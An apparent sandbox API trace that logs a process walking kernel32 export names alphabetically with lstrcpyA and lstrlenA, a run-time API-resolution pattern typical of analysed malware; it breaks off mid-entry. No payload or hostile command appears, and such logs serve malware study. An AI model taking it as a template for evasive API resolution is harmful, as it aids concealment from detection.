[0077.085] lstrlenA (lpString="COPYFILEW") returned 9 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.085] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.085] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.085] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.085] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.085] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.085] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.085] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.085] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.085] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.086] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.086] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.086] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.086] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.086] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.086] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.086] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.086] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.086] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.086] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.086] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.086] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.086] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.086] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.086] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.086] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.086] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.086] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.086] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.086] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.087] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.087] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.087] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.087] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.087] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.087] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.087] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.087] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.087] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.087] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.087] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.087] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.087] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.087] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.087] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.087] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.087] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.087] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.087] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.087] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.088] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.088] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.088] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.088] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.088] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.088] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.088] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.088] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.088] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.088] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.088] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.088] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.088] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.088] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.088] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.088] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.088] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.088] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.088] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.088] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.089] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.089] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.089] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.089] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.089] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.089] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.089] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.089] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.089] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.089] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.089] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.089] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.089] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.089] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.089] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.089] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.089] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.089] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.089] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.090] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.090] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.090] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.090] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.090] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.090] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.090] lstrlenA (lpString="DELETEATOM") returned 10 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.090] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.090] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.090] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.090] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.090] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.090] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.090] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.090] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.090] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.090] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.090] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.090] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.090] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.091] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.091] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.091] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.091] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.091] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.091] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.091] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.091] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.091] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.091] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.091] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.091] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.091] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.091] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.091] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.091] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.091] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.091] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.091] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.092] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.092] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.092] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.092] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.092] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.092] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.092] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.092] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.092] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.092] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.092] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.092] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.092] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.092] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.092] lstrcpyA 